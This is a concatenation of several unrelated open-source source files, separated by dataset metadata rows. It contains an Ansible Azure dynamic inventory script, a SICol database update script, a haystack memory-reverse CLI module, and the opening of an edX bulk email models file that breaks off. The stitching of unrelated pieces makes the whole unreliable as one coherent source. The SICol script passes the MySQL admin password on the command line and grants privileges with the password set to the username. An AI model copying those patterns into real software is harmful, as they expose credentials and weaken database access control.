# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
'''
Azure External Inventory Script
===============================
Generates dynamic inventory by making API requests to the Azure Resource
Manager using the Azure Python SDK. For instruction on installing the
Azure Python SDK see http://azure-sdk-for-python.readthedocs.org/
Authentication
--------------
The order of precedence is command line arguments, environment variables,
and finally the [default] profile found in ~/.azure/credentials.
If using a credentials file, it should be an ini formatted file with one or
more sections, which we refer to as profiles. The script looks for a
[default] section, if a profile is not specified either on the command line
or with an environment variable. The keys in a profile will match the
list of command line arguments below.
For command line arguments and environment variables specify a profile found
in your ~/.azure/credentials file, or a service principal or Active Directory
user.
Command line arguments:
- profile
- client_id
- secret
- subscription_id
- tenant
- ad_user
- password
Environment variables:
- AZURE_PROFILE
- AZURE_CLIENT_ID
- AZURE_SECRET
- AZURE_SUBSCRIPTION_ID
- AZURE_TENANT
- AZURE_AD_USER
- AZURE_PASSWORD
Run for Specific Host
-----------------------
When run for a specific host using the --host option, a resource group is
required. For a specific host, this script returns the following variables:
{
"ansible_host": "XXX.XXX.XXX.XXX",
"computer_name": "computer_name2",
"fqdn": null,
"id": "/subscriptions/subscription-id/resourceGroups/galaxy-production/providers/Microsoft.Compute/virtualMachines/object-name",
"image": {
"offer": "CentOS",
"publisher": "OpenLogic",
"sku": "7.1",
"version": "latest"
},
"location": "westus",
"mac_address": "00-00-5E-00-53-FE",
"name": "object-name",
"network_interface": "interface-name",
"network_interface_id": "/subscriptions/subscription-id/resourceGroups/galaxy-production/providers/Microsoft.Network/networkInterfaces/object-name1",
"network_security_group": null,
"network_security_group_id": null,
"os_disk": {
"name": "object-name",
"operating_system_type": "Linux"
},
"plan": null,
"powerstate": "running",
"private_ip": "172.26.3.6",
"private_ip_alloc_method": "Static",
"provisioning_state": "Succeeded",
"public_ip": "XXX.XXX.XXX.XXX",
"public_ip_alloc_method": "Static",
"public_ip_id": "/subscriptions/subscription-id/resourceGroups/galaxy-production/providers/Microsoft.Network/publicIPAddresses/object-name",
"public_ip_name": "object-name",
"resource_group": "galaxy-production",
"security_group": "object-name",
"security_group_id": "/subscriptions/subscription-id/resourceGroups/galaxy-production/providers/Microsoft.Network/networkSecurityGroups/object-name",
"tags": {
"db": "database"
},
"type": "Microsoft.Compute/virtualMachines",
"virtual_machine_size": "Standard_DS4"
}
Groups
------
When run in --list mode, instances are grouped by the following categories:
- azure
- location
- resource_group
- security_group
- tag key
- tag key_value
Control groups using azure_rm.ini or set environment variables:
AZURE_GROUP_BY_RESOURCE_GROUP=yes
AZURE_GROUP_BY_LOCATION=yes
AZURE_GROUP_BY_SECURITY_GROUP=yes
AZURE_GROUP_BY_TAG=yes
Select hosts within specific resource groups by assigning a comma separated list to:
AZURE_RESOURCE_GROUPS=resource_group_a,resource_group_b
Select hosts for specific tag key by assigning a comma separated list of tag keys to:
AZURE_TAGS=key1,key2,key3
Select hosts for specific locations:
AZURE_LOCATIONS=eastus,westus,eastus2
Or, select hosts for specific tag key:value pairs by assigning a comma separated list key:value pairs to:
AZURE_TAGS=key1:value1,key2:value2
If you don't need the powerstate, you can improve performance by turning off powerstate fetching:
AZURE_INCLUDE_POWERSTATE=no
azure_rm.ini
------------
As mentioned above, you can control execution using environment variables or a .ini file. A sample
azure_rm.ini is included. The name of the .ini file is the basename of the inventory script (in this case
'azure_rm') with a .ini extension. It also assumes the .ini file is alongside the script. To specify
a different path for the .ini file, define the AZURE_INI_PATH environment variable:
export AZURE_INI_PATH=/path/to/custom.ini
Powerstate:
-----------
The powerstate attribute indicates whether or not a host is running. If the value is 'running', the machine is
up. If the value is anything other than 'running', the machine is down, and will be unreachable.
Examples:
---------
Execute /bin/uname on all instances in the galaxy-qa resource group
$ ansible -i azure_rm.py galaxy-qa -m shell -a "/bin/uname -a"
Use the inventory script to print instance specific information
$ contrib/inventory/azure_rm.py --host my_instance_host_name --pretty
Use with a playbook
$ ansible-playbook -i contrib/inventory/azure_rm.py my_playbook.yml --limit galaxy-qa
Insecure Platform Warning
-------------------------
If you receive InsecurePlatformWarning from urllib3, install the
requests security packages:
pip install requests[security]
author:
- Chris Houseknecht (@chouseknecht)
- Matt Davis (@nitzmahone)
Company: Ansible by Red Hat
Version: 1.0.0
'''
import argparse
import ConfigParser
import json
import os
import re
import sys
from packaging.version import Version
from os.path import expanduser
HAS_AZURE = True
HAS_AZURE_EXC = None
try:
from msrestazure.azure_exceptions import CloudError
from azure.mgmt.compute import __version__ as azure_compute_version
from azure.common import AzureMissingResourceHttpError, AzureHttpError
from azure.common.credentials import ServicePrincipalCredentials, UserPassCredentials
from azure.mgmt.network.network_management_client import NetworkManagementClient
from azure.mgmt.resource.resources.resource_management_client import ResourceManagementClient
from azure.mgmt.compute.compute_management_client import ComputeManagementClient
except ImportError as exc:
HAS_AZURE_EXC = exc
HAS_AZURE = False
AZURE_CREDENTIAL_ENV_MAPPING = dict(
profile='AZURE_PROFILE',
subscription_id='AZURE_SUBSCRIPTION_ID',
client_id='AZURE_CLIENT_ID',
secret='AZURE_SECRET',
tenant='AZURE_TENANT',
ad_user='AZURE_AD_USER',
password='AZURE_PASSWORD'
)
AZURE_CONFIG_SETTINGS = dict(
resource_groups='AZURE_RESOURCE_GROUPS',
tags='AZURE_TAGS',
locations='AZURE_LOCATIONS',
include_powerstate='AZURE_INCLUDE_POWERSTATE',
group_by_resource_group='AZURE_GROUP_BY_RESOURCE_GROUP',
group_by_location='AZURE_GROUP_BY_LOCATION',
group_by_security_group='AZURE_GROUP_BY_SECURITY_GROUP',
group_by_tag='AZURE_GROUP_BY_TAG'
)
AZURE_MIN_VERSION = "0.30.0rc5"
def azure_id_to_dict(id):
pieces = re.sub(r'^\/', '', id).split('/')
result = {}
index = 0
while index < len(pieces) - 1:
result[pieces[index]] = pieces[index + 1]
index += 1
return result
class AzureRM(object):
def __init__(self, args):
self._args = args
self._compute_client = None
self._resource_client = None
self._network_client = None
self.debug = False
if args.debug:
self.debug = True
self.credentials = self._get_credentials(args)
if not self.credentials:
self.fail("Failed to get credentials. Either pass as parameters, set environment variables, "
"or define a profile in ~/.azure/credentials.")
if self.credentials.get('subscription_id', None) is None:
self.fail("Credentials did not include a subscription_id value.")
self.log("setting subscription_id")
self.subscription_id = self.credentials['subscription_id']
if self.credentials.get('client_id') is not None and \
self.credentials.get('secret') is not None and \
self.credentials.get('tenant') is not None:
self.azure_credentials = ServicePrincipalCredentials(client_id=self.credentials['client_id'],
secret=self.credentials['secret'],
tenant=self.credentials['tenant'])
elif self.credentials.get('ad_user') is not None and self.credentials.get('password') is not None:
self.azure_credentials = UserPassCredentials(self.credentials['ad_user'], self.credentials['password'])
else:
self.fail("Failed to authenticate with provided credentials. Some attributes were missing. "
"Credentials must include client_id, secret and tenant or ad_user and password.")
def log(self, msg):
if self.debug:
print(msg + u'\n')
def fail(self, msg):
raise Exception(msg)
def _get_profile(self, profile="default"):
path = expanduser("~")
path += "/.azure/credentials"
try:
config = ConfigParser.ConfigParser()
config.read(path)
except Exception as exc:
self.fail("Failed to access {0}. Check that the file exists and you have read "
"access. {1}".format(path, str(exc)))
credentials = dict()
for key in AZURE_CREDENTIAL_ENV_MAPPING:
try:
credentials[key] = config.get(profile, key, raw=True)
except:
pass
if credentials.get('client_id') is not None or credentials.get('ad_user') is not None:
return credentials
return None
def _get_env_credentials(self):
env_credentials = dict()
for attribute, env_variable in AZURE_CREDENTIAL_ENV_MAPPING.items():
env_credentials[attribute] = os.environ.get(env_variable, None)
if env_credentials['profile'] is not None:
credentials = self._get_profile(env_credentials['profile'])
return credentials
if env_credentials['client_id'] is not None or env_credentials['ad_user'] is not None:
return env_credentials
return None
def _get_credentials(self, params):
# Get authentication credentials.
# Precedence: cmd line parameters-> environment variables-> default profile in ~/.azure/credentials.
self.log('Getting credentials')
arg_credentials = dict()
for attribute, env_variable in AZURE_CREDENTIAL_ENV_MAPPING.items():
arg_credentials[attribute] = getattr(params, attribute)
# try module params
if arg_credentials['profile'] is not None:
self.log('Retrieving credentials with profile parameter.')
credentials = self._get_profile(arg_credentials['profile'])
return credentials
if arg_credentials['client_id'] is not None:
self.log('Received credentials from parameters.')
return arg_credentials
# try environment
env_credentials = self._get_env_credentials()
if env_credentials:
self.log('Received credentials from env.')
return env_credentials
# try default profile from ~./azure/credentials
default_credentials = self._get_profile()
if default_credentials:
self.log('Retrieved default profile credentials from ~/.azure/credentials.')
return default_credentials
return None
def _register(self, key):
try:
# We have to perform the one-time registration here. Otherwise, we receive an error the first
# time we attempt to use the requested client.
resource_client = self.rm_client
resource_client.providers.register(key)
except Exception as exc:
self.log("One-time registration of {0} failed - {1}".format(key, str(exc)))
self.log("You might need to register {0} using an admin account".format(key))
self.log(("To register a provider using the Python CLI: "
"https://docs.microsoft.com/azure/azure-resource-manager/"
"resource-manager-common-deployment-errors#noregisteredproviderfound"))
@property
def network_client(self):
self.log('Getting network client')
if not self._network_client:
self._network_client = NetworkManagementClient(self.azure_credentials, self.subscription_id)
self._register('Microsoft.Network')
return self._network_client
@property
def rm_client(self):
self.log('Getting resource manager client')
if not self._resource_client:
self._resource_client = ResourceManagementClient(self.azure_credentials, self.subscription_id)
return self._resource_client
@property
def compute_client(self):
self.log('Getting compute client')
if not self._compute_client:
self._compute_client = ComputeManagementClient(self.azure_credentials, self.subscription_id)
self._register('Microsoft.Compute')
return self._compute_client
class AzureInventory(object):
def __init__(self):
self._args = self._parse_cli_args()
try:
rm = AzureRM(self._args)
except Exception as e:
sys.exit("{0}".format(str(e)))
self._compute_client = rm.compute_client
self._network_client = rm.network_client
self._resource_client = rm.rm_client
self._security_groups = None
self.resource_groups = []
self.tags = None
self.locations = None
self.replace_dash_in_groups = False
self.group_by_resource_group = True
self.group_by_location = True
self.group_by_security_group = True
self.group_by_tag = True
self.include_powerstate = True
self._inventory = dict(
_meta=dict(
hostvars=dict()
),
azure=[]
)
self._get_settings()
if self._args.resource_groups:
self.resource_groups = self._args.resource_groups.split(',')
if self._args.tags:
self.tags = self._args.tags.split(',')
if self._args.locations:
self.locations = self._args.locations.split(',')
if self._args.no_powerstate:
self.include_powerstate = False
self.get_inventory()
print(self._json_format_dict(pretty=self._args.pretty))
sys.exit(0)
def _parse_cli_args(self):
# Parse command line arguments
parser = argparse.ArgumentParser(
description='Produce an Ansible Inventory file for an Azure subscription')
parser.add_argument('--list', action='store_true', default=True,
help='List instances (default: True)')
parser.add_argument('--debug', action='store_true', default=False,
help='Send debug messages to STDOUT')
parser.add_argument('--host', action='store',
help='Get all information about an instance')
parser.add_argument('--pretty', action='store_true', default=False,
help='Pretty print JSON output(default: False)')
parser.add_argument('--profile', action='store',
help='Azure profile contained in ~/.azure/credentials')
parser.add_argument('--subscription_id', action='store',
help='Azure Subscription Id')
parser.add_argument('--client_id', action='store',
help='Azure Client Id ')
parser.add_argument('--secret', action='store',
help='Azure Client Secret')
parser.add_argument('--tenant', action='store',
help='Azure Tenant Id')
parser.add_argument('--ad-user', action='store',
help='Active Directory User')
parser.add_argument('--password', action='store',
help='password')
parser.add_argument('--resource-groups', action='store',
help='Return inventory for comma separated list of resource group names')
parser.add_argument('--tags', action='store',
help='Return inventory for comma separated list of tag key:value pairs')
parser.add_argument('--locations', action='store',
help='Return inventory for comma separated list of locations')
parser.add_argument('--no-powerstate', action='store_true', default=False,
help='Do not include the power state of each virtual host')
return parser.parse_args()
def get_inventory(self):
if len(self.resource_groups) > 0:
# get VMs for requested resource groups
for resource_group in self.resource_groups:
try:
virtual_machines = self._compute_client.virtual_machines.list(resource_group)
except Exception as exc:
sys.exit("Error: fetching virtual machines for resource group {0} - {1}".format(resource_group,
str(exc)))
if self._args.host or self.tags:
selected_machines = self._selected_machines(virtual_machines)
self._load_machines(selected_machines)
else:
self._load_machines(virtual_machines)
else:
# get all VMs within the subscription
try:
virtual_machines = self._compute_client.virtual_machines.list_all()
except Exception as exc:
sys.exit("Error: fetching virtual machines - {0}".format(str(exc)))
if self._args.host or self.tags or self.locations:
selected_machines = self._selected_machines(virtual_machines)
self._load_machines(selected_machines)
else:
self._load_machines(virtual_machines)
def _load_machines(self, machines):
for machine in machines:
id_dict = azure_id_to_dict(machine.id)
# TODO - The API is returning an ID value containing resource group name in ALL CAPS. If/when it gets
# fixed, we should remove the .lower(). Opened Issue
# #574: https://github.com/Azure/azure-sdk-for-python/issues/574
resource_group = id_dict['resourceGroups'].lower()
if self.group_by_security_group:
self._get_security_groups(resource_group)
host_vars = dict(
ansible_host=None,
private_ip=None,
private_ip_alloc_method=None,
public_ip=None,
public_ip_name=None,
public_ip_id=None,
public_ip_alloc_method=None,
fqdn=None,
location=machine.location,
name=machine.name,
type=machine.type,
id=machine.id,
tags=machine.tags,
network_interface_id=None,
network_interface=None,
resource_group=resource_group,
mac_address=None,
plan=(machine.plan.name if machine.plan else None),
virtual_machine_size=machine.hardware_profile.vm_size,
computer_name=(machine.os_profile.computer_name if machine.os_profile else None),
provisioning_state=machine.provisioning_state,
)
host_vars['os_disk'] = dict(
name=machine.storage_profile.os_disk.name,
operating_system_type=machine.storage_profile.os_disk.os_type.value
)
if self.include_powerstate:
host_vars['powerstate'] = self._get_powerstate(resource_group, machine.name)
if machine.storage_profile.image_reference:
host_vars['image'] = dict(
offer=machine.storage_profile.image_reference.offer,
publisher=machine.storage_profile.image_reference.publisher,
sku=machine.storage_profile.image_reference.sku,
version=machine.storage_profile.image_reference.version
)
# Add windows details
if machine.os_profile is not None and machine.os_profile.windows_configuration is not None:
host_vars['windows_auto_updates_enabled'] = \
machine.os_profile.windows_configuration.enable_automatic_updates
host_vars['windows_timezone'] = machine.os_profile.windows_configuration.time_zone
host_vars['windows_rm'] = None
if machine.os_profile.windows_configuration.win_rm is not None:
host_vars['windows_rm'] = dict(listeners=None)
if machine.os_profile.windows_configuration.win_rm.listeners is not None:
host_vars['windows_rm']['listeners'] = []
for listener in machine.os_profile.windows_configuration.win_rm.listeners:
host_vars['windows_rm']['listeners'].append(dict(protocol=listener.protocol,
certificate_url=listener.certificate_url))
for interface in machine.network_profile.network_interfaces:
interface_reference = self._parse_ref_id(interface.id)
network_interface = self._network_client.network_interfaces.get(
interface_reference['resourceGroups'],
interface_reference['networkInterfaces'])
if network_interface.primary:
if self.group_by_security_group and \
self._security_groups[resource_group].get(network_interface.id, None):
host_vars['security_group'] = \
self._security_groups[resource_group][network_interface.id]['name']
host_vars['security_group_id'] = \
self._security_groups[resource_group][network_interface.id]['id']
host_vars['network_interface'] = network_interface.name
host_vars['network_interface_id'] = network_interface.id
host_vars['mac_address'] = network_interface.mac_address
for ip_config in network_interface.ip_configurations:
host_vars['private_ip'] = ip_config.private_ip_address
host_vars['private_ip_alloc_method'] = ip_config.private_ip_allocation_method
if ip_config.public_ip_address:
public_ip_reference = self._parse_ref_id(ip_config.public_ip_address.id)
public_ip_address = self._network_client.public_ip_addresses.get(
public_ip_reference['resourceGroups'],
public_ip_reference['publicIPAddresses'])
host_vars['ansible_host'] = public_ip_address.ip_address
host_vars['public_ip'] = public_ip_address.ip_address
host_vars['public_ip_name'] = public_ip_address.name
host_vars['public_ip_alloc_method'] = public_ip_address.public_ip_allocation_method
host_vars['public_ip_id'] = public_ip_address.id
if public_ip_address.dns_settings:
host_vars['fqdn'] = public_ip_address.dns_settings.fqdn
self._add_host(host_vars)
def _selected_machines(self, virtual_machines):
selected_machines = []
for machine in virtual_machines:
if self._args.host and self._args.host == machine.name:
selected_machines.append(machine)
if self.tags and self._tags_match(machine.tags, self.tags):
selected_machines.append(machine)
if self.locations and machine.location in self.locations:
selected_machines.append(machine)
return selected_machines
def _get_security_groups(self, resource_group):
''' For a given resource_group build a mapping of network_interface.id to security_group name '''
if not self._security_groups:
self._security_groups = dict()
if not self._security_groups.get(resource_group):
self._security_groups[resource_group] = dict()
for group in self._network_client.network_security_groups.list(resource_group):
if group.network_interfaces:
for interface in group.network_interfaces:
self._security_groups[resource_group][interface.id] = dict(
name=group.name,
id=group.id
)
def _get_powerstate(self, resource_group, name):
try:
vm = self._compute_client.virtual_machines.get(resource_group,
name,
expand='instanceview')
except Exception as exc:
sys.exit("Error: fetching instanceview for host {0} - {1}".format(name, str(exc)))
return next((s.code.replace('PowerState/', '')
for s in vm.instance_view.statuses if s.code.startswith('PowerState')), None)
def _add_host(self, vars):
host_name = self._to_safe(vars['name'])
resource_group = self._to_safe(vars['resource_group'])
security_group = None
if vars.get('security_group'):
security_group = self._to_safe(vars['security_group'])
if self.group_by_resource_group:
if not self._inventory.get(resource_group):
self._inventory[resource_group] = []
self._inventory[resource_group].append(host_name)
if self.group_by_location:
if not self._inventory.get(vars['location']):
self._inventory[vars['location']] = []
self._inventory[vars['location']].append(host_name)
if self.group_by_security_group and security_group:
if not self._inventory.get(security_group):
self._inventory[security_group] = []
self._inventory[security_group].append(host_name)
self._inventory['_meta']['hostvars'][host_name] = vars
self._inventory['azure'].append(host_name)
if self.group_by_tag and vars.get('tags'):
for key, value in vars['tags'].items():
safe_key = self._to_safe(key)
safe_value = safe_key + '_' + self._to_safe(value)
if not self._inventory.get(safe_key):
self._inventory[safe_key] = []
if not self._inventory.get(safe_value):
self._inventory[safe_value] = []
self._inventory[safe_key].append(host_name)
self._inventory[safe_value].append(host_name)
def _json_format_dict(self, pretty=False):
# convert inventory to json
if pretty:
return json.dumps(self._inventory, sort_keys=True, indent=2)
else:
return json.dumps(self._inventory)
def _get_settings(self):
# Load settings from the .ini, if it exists. Otherwise,
# look for environment values.
file_settings = self._load_settings()
if file_settings:
for key in AZURE_CONFIG_SETTINGS:
if key in ('resource_groups', 'tags', 'locations') and file_settings.get(key):
values = file_settings.get(key).split(',')
if len(values) > 0:
setattr(self, key, values)
elif file_settings.get(key):
val = self._to_boolean(file_settings[key])
setattr(self, key, val)
else:
env_settings = self._get_env_settings()
for key in AZURE_CONFIG_SETTINGS:
if key in('resource_groups', 'tags', 'locations') and env_settings.get(key):
values = env_settings.get(key).split(',')
if len(values) > 0:
setattr(self, key, values)
elif env_settings.get(key, None) is not None:
val = self._to_boolean(env_settings[key])
setattr(self, key, val)
def _parse_ref_id(self, reference):
response = {}
keys = reference.strip('/').split('/')
for index in range(len(keys)):
if index < len(keys) - 1 and index % 2 == 0:
response[keys[index]] = keys[index + 1]
return response
def _to_boolean(self, value):
if value in ['Yes', 'yes', 1, 'True', 'true', True]:
result = True
elif value in ['No', 'no', 0, 'False', 'false', False]:
result = False
else:
result = True
return result
def _get_env_settings(self):
env_settings = dict()
for attribute, env_variable in AZURE_CONFIG_SETTINGS.items():
env_settings[attribute] = os.environ.get(env_variable, None)
return env_settings
def _load_settings(self):
basename = os.path.splitext(os.path.basename(__file__))[0]
default_path = os.path.join(os.path.dirname(__file__), (basename + '.ini'))
path = os.path.expanduser(os.path.expandvars(os.environ.get('AZURE_INI_PATH', default_path)))
config = None
settings = None
try:
config = ConfigParser.ConfigParser()
config.read(path)
except:
pass
if config is not None:
settings = dict()
for key in AZURE_CONFIG_SETTINGS:
try:
settings[key] = config.get('azure', key, raw=True)
except:
pass
return settings
def _tags_match(self, tag_obj, tag_args):
'''
Return True if the tags object from a VM contains the requested tag values.
:param tag_obj: Dictionary of string:string pairs
:param tag_args: List of strings in the form key=value
:return: boolean
'''
if not tag_obj:
return False
matches = 0
for arg in tag_args:
arg_key = arg
arg_value = None
if re.search(r':', arg):
arg_key, arg_value = arg.split(':')
if arg_value and tag_obj.get(arg_key, None) == arg_value:
matches += 1
elif not arg_value and tag_obj.get(arg_key, None) is not None:
matches += 1
if matches == len(tag_args):
return True
return False
def _to_safe(self, word):
''' Converts 'bad' characters in a string to underscores so they can be used as Ansible groups '''
regex = "[^A-Za-z0-9\_"
if not self.replace_dash_in_groups:
regex += "\-"
return re.sub(regex + "]", "_", word)
def main():
if not HAS_AZURE:
sys.exit("The Azure python sdk is not installed (try `pip install 'azure>=2.0.0rc5' --upgrade`) - {0}".format(HAS_AZURE_EXC))
if Version(azure_compute_version) < Version(AZURE_MIN_VERSION):
sys.exit("Expecting azure.mgmt.compute.__version__ to be {0}. Found version {1} "
"Do you have Azure >= 2.0.0rc5 installed? (try `pip install 'azure>=2.0.0rc5' --upgrade`)".format(AZURE_MIN_VERSION, azure_compute_version))
AzureInventory()
if __name__ == '__main__':
main()
|
gpl-3.0
| 7,014,954,423,921,944,000
| 39.834165
| 157
| 0.602156
| false
| 4.268639
| true
| false
| false
|
cria/microSICol
|
update_external_db.py
|
1
|
6512
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author:Renato Arnellas Coelho renatoac at gmail dot com
#
# Script to update Sicol database
#
# Warning:
# 1 - Add MySQL executable directory to system's PATH environment variable
# 2 - This script _MUST_ be executed on root directory
def updateDB(full_mode=True):
'''
full_mode = whether to update only DB structure (False) or all possible data (True)
@return bool - True = OK! False = Error found
'''
import getpass
import os
import platform
from sys import exit
print "Updating MySQL database..."
if platform.system() == "Windows" or platform.system() == "Microsoft":
import winsound
####################
# User data
####################
dados = {}
dados['mysql_login'] = raw_input("MySQL administrator login: ")
dados['mysql_pwd'] = getpass.getpass("MySQL administrator password: ")
dados['mysql_bd'] = raw_input("MySQL Database (e.g. 'sicol_v123'): ")
dados['mysql_user'] = raw_input("Sicol login to MySQL (e.g. 'sicol'): ")
####################
# Internal data
####################
sicol_path = os.getcwd()+os.sep+'db'+os.sep+'scripts'+os.sep
if platform.system() == "Windows" or platform.system() == "Microsoft":
mysql_path = [x for x in os.environ['PATH'].split(";") if x.lower().find('mysql') != -1]
else: #UNIX
pipe = os.popen("which mysql") #grab where MySQL is installed
mysql_path = pipe.read().strip()
host = "localhost"
user = dados['mysql_login']
pwd = dados['mysql_pwd']
####################
# DB update script
####################
if mysql_path == '' or mysql_path == []:
print "*********** ERROR ***********"
print "Please insert path to executable directory (mysql.exe) in OS 'PATH' variable."
raw_input() #Wait for user input...
return False
else:
if platform.system() == "Windows" or platform.system() == "Microsoft":
#Ignore whether PATH ends with '\' or not
mysql_path = mysql_path[0]
if mysql_path[-1] != '\\': mysql_path += '\\'
mysql_path = '"' + mysql_path + 'mysql.exe"'
try:
bd_version = dados['mysql_bd'].split("_")[1]
except Exception,e:
print "*********** ERROR ***********"
print "Please type \"sicol_v###\" where ### = version number."
raw_input() #Wait for user input...
return False
path_to_db = sicol_path + bd_version + os.sep
# Load mysql_script_empty.sql
dump_file = 'mysql_script_empty.sql'
print "Loading database structure..."
try:
os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,path_to_db+dump_file) )
except Exception,e:
print "*********** ERROR ***********"
print str(e)
raw_input() #Wait for user input...
#return False
# Load mysql_start_dump.sql
dump_file = "dump"+os.sep+"mysql_start_dump.sql"
print "Loading initial dump to database..."
try:
os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,path_to_db+dump_file) )
except Exception,e:
print "*********** ERROR ***********"
print str(e)
raw_input() #Wait for user input...
return False
######################
# Load additional data
######################
if full_mode:
if platform.system() == "Windows" or platform.system() == "Microsoft":
winsound.MessageBeep(winsound.MB_ICONASTERISK)
opt = raw_input("Do you want to load test data? (y/n)\n")[0].lower()
if opt == 'y':
# Load mysql_testdata_dump.sql
dump_file = "dump"+os.sep+"mysql_testdata_dump.sql"
print "Loading test data to database..."
try:
os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,path_to_db+dump_file) )
except Exception,e:
print "*********** ERROR ***********"
print str(e)
raw_input() #Wait for user input...
return
if platform.system() == "Windows" or platform.system() == "Microsoft":
winsound.MessageBeep(winsound.MB_ICONASTERISK)
opt = raw_input("Do you want to load all Brazilian cities name to database? (y/n)\n")[0].lower()
if opt == 'y':
# Load mysql_cities_dump.sql
dump_file = "dump"+os.sep+"mysql_cities_dump.sql"
print "Loading Brazilian cities name to database..."
try:
os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,path_to_db+dump_file) )
except Exception,e:
print "*********** ERROR ***********"
print str(e)
raw_input() #Wait for user input...
return
if platform.system() == "Windows" or platform.system() == "Microsoft":
winsound.MessageBeep(winsound.MB_ICONASTERISK)
opt = raw_input("Do you want to load debug data? (y/n)\n")[0].lower()
if opt == 'y':
# Load mysql_cities_dump.sql
dump_file = "dump"+os.sep+"mysql_debug_dump.sql"
print "Loading debug data to database..."
try:
os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,path_to_db+dump_file) )
except Exception,e:
print "*********** ERROR ***********"
print str(e)
raw_input() #Wait for user input...
return
########################
# End of additional data
########################
# Give database permissions to "sicol" user
print "Transfering access permission to user \"%s\"..." % dados['mysql_user']
try:
#Create temp file in order to change user permissions
f = open('temp_user_access_bd.sql','w')
f.write("GRANT ALL PRIVILEGES ON `%s`.* TO '%s'@localhost IDENTIFIED BY '%s';FLUSH PRIVILEGES;" % (dados['mysql_bd'].replace("_","\\_"),dados['mysql_user'],dados['mysql_user']))
f.close()
os.system("%s -h%s -u%s -p%s < %s" % (mysql_path,host,user,pwd,os.getcwd()+os.sep+'temp_user_access_bd.sql') )
os.unlink('temp_user_access_bd.sql')
except Exception,e:
print "*********** ERROR ***********"
print str(e)
raw_input() #Wait for user input...
return
####################
# End of update
####################
if platform.system() == "Windows" or platform.system() == "Microsoft":
winsound.MessageBeep(winsound.MB_ICONEXCLAMATION)
print "****************************"
raw_input("Update finished. Press [ENTER] to continue.")
#If this script is called locally...
if __name__ == "__main__":
print "*** Update SICol Database ***"
updateDB()
print "*** Update Finished ***"
|
gpl-2.0
| 2,520,255,957,991,356,000
| 38.447205
| 181
| 0.555129
| false
| 3.465673
| false
| false
| false
|
trolldbois/python-haystack-reverse
|
haystack/reverse/cli.py
|
1
|
4337
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
"""Entry points related to reverse. """
import os
import sys
from haystack import argparse_utils
from haystack import cli
from haystack.reverse import api
# the description of the function
REVERSE_DESC = 'Reverse the data structure from the process memory'
REVERSE_SHOW_DESC = 'Show the record at a specific address'
REVERSE_PARENT_DESC = 'List the predecessors pointing to the record at this address'
REVERSE_HEX_DESC = 'Show the Hex values for the record at that address.'
def show_hex(args):
""" Show the Hex values for the record at that address. """
memory_handler = cli.make_memory_handler(args)
process_context = memory_handler.get_reverse_context()
ctx = process_context.get_context_for_address(args.address)
try:
st = ctx.get_record_at_address(args.address)
print(repr(st.bytes))
except ValueError as e:
print(None)
return
def show_predecessors_cmdline(args):
"""
Show the predecessors that point to a record at a particular address.
:param args: cmdline args
:return:
"""
memory_handler = cli.make_memory_handler(args)
process_context = memory_handler.get_reverse_context()
ctx = process_context.get_context_for_address(args.address)
try:
child_record = ctx.get_record_at_address(args.address)
except ValueError as e:
print(None)
return
records = api.get_record_predecessors(memory_handler, child_record)
if len(records) == 0:
print(None)
else:
for p_record in records:
print('#0x%x\n%s\n' % (p_record.address, p_record.to_string()))
return
def reverse_show_cmdline(args):
""" Show the record at a specific address. """
memory_handler = cli.make_memory_handler(args)
process_context = memory_handler.get_reverse_context()
ctx = process_context.get_context_for_address(args.address)
try:
st = ctx.get_record_at_address(args.address)
print(st.to_string())
except ValueError:
print(None)
return
def reverse_cmdline(args):
""" Reverse """
from haystack.reverse import api as rapi
# get the memory handler adequate for the type requested
memory_handler = cli.make_memory_handler(args)
# do the search
rapi.reverse_instances(memory_handler)
return
def reverse():
argv = sys.argv[1:]
desc = REVERSE_DESC
rootparser = cli.base_argparser(program_name=os.path.basename(sys.argv[0]), description=desc)
rootparser.set_defaults(func=reverse_cmdline)
opts = rootparser.parse_args(argv)
# apply verbosity
cli.set_logging_level(opts)
# execute function
opts.func(opts)
return
def reverse_show():
argv = sys.argv[1:]
desc = REVERSE_SHOW_DESC
rootparser = cli.base_argparser(program_name=os.path.basename(sys.argv[0]), description=desc)
rootparser.add_argument('address', type=argparse_utils.int16, help='Record memory address in hex')
rootparser.set_defaults(func=reverse_show_cmdline)
opts = rootparser.parse_args(argv)
# apply verbosity
cli.set_logging_level(opts)
# execute function
opts.func(opts)
return
def reverse_parents():
argv = sys.argv[1:]
desc = REVERSE_PARENT_DESC
rootparser = cli.base_argparser(program_name=os.path.basename(sys.argv[0]), description=desc)
rootparser.add_argument('address', type=argparse_utils.int16, action='store', default=None,
help='Hex address of the child structure')
rootparser.set_defaults(func=show_predecessors_cmdline)
opts = rootparser.parse_args(argv)
# apply verbosity
cli.set_logging_level(opts)
# execute function
opts.func(opts)
return
def reverse_hex():
argv = sys.argv[1:]
desc = REVERSE_HEX_DESC
rootparser = cli.base_argparser(program_name=os.path.basename(sys.argv[0]), description=desc)
rootparser.add_argument('address', type=argparse_utils.int16, action='store', default=None,
help='Specify the address of the record, or encompassed by the record')
rootparser.set_defaults(func=show_hex)
opts = rootparser.parse_args(argv)
# apply verbosity
cli.set_logging_level(opts)
# execute function
opts.func(opts)
return
|
gpl-3.0
| 3,501,183,569,568,600,600
| 30.889706
| 102
| 0.682038
| false
| 3.602159
| false
| false
| false
|
torchingloom/edx-platform
|
lms/djangoapps/bulk_email/models.py
|
1
|
11002
|
"""
Models for bulk email
WE'RE USING MIGRATIONS!
If you make changes to this model, be sure to create an appropriate migration
file and check it in at the same time as your model changes. To do that,
1. Go to the edx-platform dir
2. ./manage.py lms schemamigration bulk_email --auto description_of_your_change
3. Add the migration file created in edx-platform/lms/djangoapps/bulk_email/migrations/
"""
import logging
from django.db import models, transaction
from django.contrib.auth.models import User
from html_to_text import html_to_text
import hashlib
from django.conf import settings
from .fields import SeparatedValuesField
log = logging.getLogger(__name__)
# Bulk email to_options - the send to options that users can
# select from when they send email.
SEND_TO_MYSELF = 'myself'
